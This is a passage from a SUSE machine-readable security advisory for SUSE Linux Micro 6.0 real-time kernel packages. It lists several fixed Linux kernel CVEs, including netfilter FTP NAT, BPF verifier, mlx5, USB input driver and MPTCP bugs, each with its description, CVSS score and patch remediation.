"url": "https://www.suse.com/security/cve/CVE-2025-68204"
},
{
"category": "external",
"summary": "SUSE Bug 1255224 for CVE-2025-68204",
"url": "https://bugzilla.suse.com/1255224"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68204"
},
{
"cve": "CVE-2025-68206",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68206"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_ct: add seqadj extension for natted connections\n\nSequence adjustment may be required for FTP traffic with PASV/EPSV modes.\ndue to need to re-write packet payload (IP, port) on the ftp control\nconnection. This can require changes to the TCP length and expected\nseq / ack_seq.\n\nThe easiest way to reproduce this issue is with PASV mode.\nExample ruleset:\ntable inet ftp_nat {\n ct helper ftp_helper {\n type \"ftp\" protocol tcp\n l3proto inet\n }\n\n chain prerouting {\n type filter hook prerouting priority 0; policy accept;\n tcp dport 21 ct state new ct helper set \"ftp_helper\"\n }\n}\ntable ip nat {\n chain prerouting {\n type nat hook prerouting priority -100; policy accept;\n tcp dport 21 dnat ip prefix to ip daddr map {\n\t\t\t192.168.100.1 : 192.168.13.2/32 }\n }\n\n chain postrouting {\n type nat hook postrouting priority 100 ; policy accept;\n tcp sport 21 snat ip prefix to ip saddr map {\n\t\t\t192.168.13.2 : 192.168.100.1/32 }\n }\n}\n\nNote that the ftp helper gets assigned *after* the dnat setup.\n\nThe inverse (nat after helper assign) is handled by an existing\ncheck in nf_nat_setup_info() and will not show the problem.\n\nTopoloy:\n\n +-------------------+ +----------------------------------+\n | FTP: 192.168.13.2 | \u003c-\u003e | NAT: 192.168.13.3, 192.168.100.1 |\n +-------------------+ +----------------------------------+\n |\n +-----------------------+\n | Client: 192.168.100.2 |\n +-----------------------+\n\nftp nat changes do not work as expected in this case:\nConnected to 192.168.100.1.\n[..]\nftp\u003e epsv\nEPSV/EPRT on IPv4 off.\nftp\u003e ls\n227 Entering passive mode (192,168,100,1,209,129).\n421 Service not available, remote server has closed connection.\n\nKernel logs:\nMissing nfct_seqadj_ext_add() setup call\nWARNING: CPU: 1 PID: 0 at net/netfilter/nf_conntrack_seqadj.c:41\n[..]\n __nf_nat_mangle_tcp_packet+0x100/0x160 [nf_nat]\n nf_nat_ftp+0x142/0x280 [nf_nat_ftp]\n help+0x4d1/0x880 [nf_conntrack_ftp]\n nf_confirm+0x122/0x2e0 [nf_conntrack]\n nf_hook_slow+0x3c/0xb0\n ..\n\nFix this by adding the required extension when a conntrack helper is assigned\nto a connection that has a nat binding.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68206",
"url": "https://www.suse.com/security/cve/CVE-2025-68206"
},
{
"category": "external",
"summary": "SUSE Bug 1255142 for CVE-2025-68206",
"url": "https://bugzilla.suse.com/1255142"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68206"
},
{
"cve": "CVE-2025-68208",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68208"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: account for current allocated stack depth in widen_imprecise_scalars()\n\nThe usage pattern for widen_imprecise_scalars() looks as follows:\n\n prev_st = find_prev_entry(env, ...);\n queued_st = push_stack(...);\n widen_imprecise_scalars(env, prev_st, queued_st);\n\nWhere prev_st is an ancestor of the queued_st in the explored states\ntree. This ancestor is not guaranteed to have same allocated stack\ndepth as queued_st. E.g. in the following case:\n\n def main():\n for i in 1..2:\n foo(i) // same callsite, differnt param\n\n def foo(i):\n if i == 1:\n use 128 bytes of stack\n iterator based loop\n\nHere, for a second \u0027foo\u0027 call prev_st-\u003eallocated_stack is 128,\nwhile queued_st-\u003eallocated_stack is much smaller.\nwiden_imprecise_scalars() needs to take this into account and avoid\naccessing bpf_verifier_state-\u003eframe[*]-\u003estack out of bounds.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68208",
"url": "https://www.suse.com/security/cve/CVE-2025-68208"
},
{
"category": "external",
"summary": "SUSE Bug 1255227 for CVE-2025-68208",
"url": "https://bugzilla.suse.com/1255227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68208"
},
{
"cve": "CVE-2025-68209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlx5: Fix default values in create CQ\n\nCurrently, CQs without a completion function are assigned the\nmlx5_add_cq_to_tasklet function by default. This is problematic since\nonly user CQs created through the mlx5_ib driver are intended to use\nthis function.\n\nAdditionally, all CQs that will use doorbells instead of polling for\ncompletions must call mlx5_cq_arm. However, the default CQ creation flow\nleaves a valid value in the CQ\u0027s arm_db field, allowing FW to send\ninterrupts to polling-only CQs in certain corner cases.\n\nThese two factors would allow a polling-only kernel CQ to be triggered\nby an EQ interrupt and call a completion function intended only for user\nCQs, causing a null pointer exception.\n\nSome areas in the driver have prevented this issue with one-off fixes\nbut did not address the root cause.\n\nThis patch fixes the described issue by adding defaults to the create CQ\nflow. It adds a default dummy completion function to protect against\nnull pointer exceptions, and it sets an invalid command sequence number\nby default in kernel CQs to prevent the FW from sending an interrupt to\nthe CQ until it is armed. User CQs are responsible for their own\ninitialization values.\n\nCallers of mlx5_core_create_cq are responsible for changing the\ncompletion function and arming the CQ per their needs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68209",
"url": "https://www.suse.com/security/cve/CVE-2025-68209"
},
{
"category": "external",
"summary": "SUSE Bug 1255230 for CVE-2025-68209",
"url": "https://bugzilla.suse.com/1255230"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68209"
},
{
"cve": "CVE-2025-68217",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68217"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: pegasus-notetaker - fix potential out-of-bounds access\n\nIn the pegasus_notetaker driver, the pegasus_probe() function allocates\nthe URB transfer buffer using the wMaxPacketSize value from\nthe endpoint descriptor. An attacker can use a malicious USB descriptor\nto force the allocation of a very small buffer.\n\nSubsequently, if the device sends an interrupt packet with a specific\npattern (e.g., where the first byte is 0x80 or 0x42),\nthe pegasus_parse_packet() function parses the packet without checking\nthe allocated buffer size. This leads to an out-of-bounds memory access.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68217",
"url": "https://www.suse.com/security/cve/CVE-2025-68217"
},
{
"category": "external",
"summary": "SUSE Bug 1255221 for CVE-2025-68217",
"url": "https://bugzilla.suse.com/1255221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68217"
},
{
"cve": "CVE-2025-68218",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68218"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-multipath: fix lockdep WARN due to partition scan work\n\nBlktests test cases nvme/014, 057 and 058 fail occasionally due to a\nlockdep WARN. As reported in the Closes tag URL, the WARN indicates that\na deadlock can happen due to the dependency among disk-\u003eopen_mutex,\nkblockd workqueue completion and partition_scan_work completion.\n\nTo avoid the lockdep WARN and the potential deadlock, cut the dependency\nby running the partition_scan_work not by kblockd workqueue but by\nnvme_wq.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68218",
"url": "https://www.suse.com/security/cve/CVE-2025-68218"
},
{
"category": "external",
"summary": "SUSE Bug 1255245 for CVE-2025-68218",
"url": "https://bugzilla.suse.com/1255245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68218"
},
{
"cve": "CVE-2025-68222",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68222"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: s32cc: fix uninitialized memory in s32_pinctrl_desc\n\ns32_pinctrl_desc is allocated with devm_kmalloc(), but not all of its\nfields are initialized. Notably, num_custom_params is used in\npinconf_generic_parse_dt_config(), resulting in intermittent allocation\nerrors, such as the following splat when probing i2c-imx:\n\n WARNING: CPU: 0 PID: 176 at mm/page_alloc.c:4795 __alloc_pages_noprof+0x290/0x300\n [...]\n Hardware name: NXP S32G3 Reference Design Board 3 (S32G-VNP-RDB3) (DT)\n [...]\n Call trace:\n __alloc_pages_noprof+0x290/0x300 (P)\n ___kmalloc_large_node+0x84/0x168\n __kmalloc_large_node_noprof+0x34/0x120\n __kmalloc_noprof+0x2ac/0x378\n pinconf_generic_parse_dt_config+0x68/0x1a0\n s32_dt_node_to_map+0x104/0x248\n dt_to_map_one_config+0x154/0x1d8\n pinctrl_dt_to_map+0x12c/0x280\n create_pinctrl+0x6c/0x270\n pinctrl_get+0xc0/0x170\n devm_pinctrl_get+0x50/0xa0\n pinctrl_bind_pins+0x60/0x2a0\n really_probe+0x60/0x3a0\n [...]\n __platform_driver_register+0x2c/0x40\n i2c_adap_imx_init+0x28/0xff8 [i2c_imx]\n [...]\n\nThis results in later parse failures that can cause issues in dependent\ndrivers:\n\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c0-pins/i2c0-grp0: could not parse node property\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c0-pins/i2c0-grp0: could not parse node property\n [...]\n pca953x 0-0022: failed writing register: -6\n i2c i2c-0: IMX I2C adapter registered\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c2-pins/i2c2-grp0: could not parse node property\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c2-pins/i2c2-grp0: could not parse node property\n i2c i2c-1: IMX I2C adapter registered\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c4-pins/i2c4-grp0: could not parse node property\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c4-pins/i2c4-grp0: could not parse node property\n i2c i2c-2: IMX I2C adapter registered\n\nFix this by initializing s32_pinctrl_desc with devm_kzalloc() instead of\ndevm_kmalloc() in s32_pinctrl_probe(), which sets the previously\nuninitialized fields to zero.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68222",
"url": "https://www.suse.com/security/cve/CVE-2025-68222"
},
{
"category": "external",
"summary": "SUSE Bug 1255218 for CVE-2025-68222",
"url": "https://bugzilla.suse.com/1255218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68222"
},
{
"cve": "CVE-2025-68227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Fix proto fallback detection with BPF\n\nThe sockmap feature allows bpf syscall from userspace, or based\non bpf sockops, replacing the sk_prot of sockets during protocol stack\nprocessing with sockmap\u0027s custom read/write interfaces.\n\u0027\u0027\u0027\ntcp_rcv_state_process()\n syn_recv_sock()/subflow_syn_recv_sock()\n tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB)\n bpf_skops_established \u003c== sockops\n bpf_sock_map_update(sk) \u003c== call bpf helper\n tcp_bpf_update_proto() \u003c== update sk_prot\n\u0027\u0027\u0027\n\nWhen the server has MPTCP enabled but the client sends a TCP SYN\nwithout MPTCP, subflow_syn_recv_sock() performs a fallback on the\nsubflow, replacing the subflow sk\u0027s sk_prot with the native sk_prot.\n\u0027\u0027\u0027\nsubflow_syn_recv_sock()\n subflow_ulp_fallback()\n subflow_drop_ctx()\n mptcp_subflow_ops_undo_override()\n\u0027\u0027\u0027\n\nThen, this subflow can be normally used by sockmap, which replaces the\nnative sk_prot with sockmap\u0027s custom sk_prot. The issue occurs when the\nuser executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops().\nHere, it uses sk-\u003esk_prot to compare with the native sk_prot, but this\nis incorrect when sockmap is used, as we may incorrectly set\nsk-\u003esk_socket-\u003eops.\n\nThis fix uses the more generic sk_family for the comparison instead.\n\nAdditionally, this also prevents a WARNING from occurring:\n\nresult from ./scripts/decode_stacktrace.sh:\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \\\n(net/mptcp/protocol.c:4005)\nModules linked in:\n...\n\nPKRU: 55555554\nCall Trace:\n\u003cTASK\u003e\ndo_accept (net/socket.c:1989)\n__sys_accept4 (net/socket.c:2028 net/socket.c:2057)\n__x64_sys_accept (net/socket.c:2067)\nx64_sys_call (arch/x86/entry/syscall_64.c:41)\ndo_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\nRIP: 0033:0x7f87ac92b83d\n\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68227",
"url": "https://www.suse.com/security/cve/CVE-2025-68227"
},
{
"category": "external",
"summary": "SUSE Bug 1255216 for CVE-2025-68227",
"url": "https://bugzilla.suse.com/1255216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68227"
},
{
"cve": "CVE-2025-68230",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68230"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: fix gpu page fault after hibernation on PF passthrough\n\nOn PF passthrough environment, after hibernate and then resume, coralgemm\nwill cause gpu page fault.\n\nMode1 reset happens during hibernate, but partition mode is not restored\non resume, register mmCP_HYP_XCP_CTL and mmCP_PSP_XCP_CTL is not right\nafter resume. When CP access the MQD BO, wrong stride size is used,\nthis will cause out of bound access on the MQD BO, resulting page fault.\n\nThe fix is to ensure gfx_v9_4_3_switch_compute_partition() is called\nwhen resume from a hibernation.\nKFD resume is called separately during a reset recovery or resume from\nsuspend sequence. Hence it\u0027s not required to be called as part of\npartition switch.\n\n(cherry picked from commit 5d1b32cfe4a676fe552416cb5ae847b215463a1a)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68230",
"url": "https://www.suse.com/security/cve/CVE-2025-68230"
},
{
"category": "external",
"summary": "SUSE Bug 1255134 for CVE-2025-68230",
"url": "https://bugzilla.suse.com/1255134"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68230"
},
{
"cve": "CVE-2025-68233",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68233"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tegra: Add call to put_pid()\n\nAdd a call to put_pid() corresponding to get_task_pid().\nhost1x_memory_context_alloc() does not take ownership of the PID so we\nneed to free it here to avoid leaking.\n\n[mperttunen@nvidia.com: reword commit message]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68233",
"url": "https://www.suse.com/security/cve/CVE-2025-68233"
},
{
"category": "external",
"summary": "SUSE Bug 1255206 for CVE-2025-68233",
"url": "https://bugzilla.suse.com/1255206"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
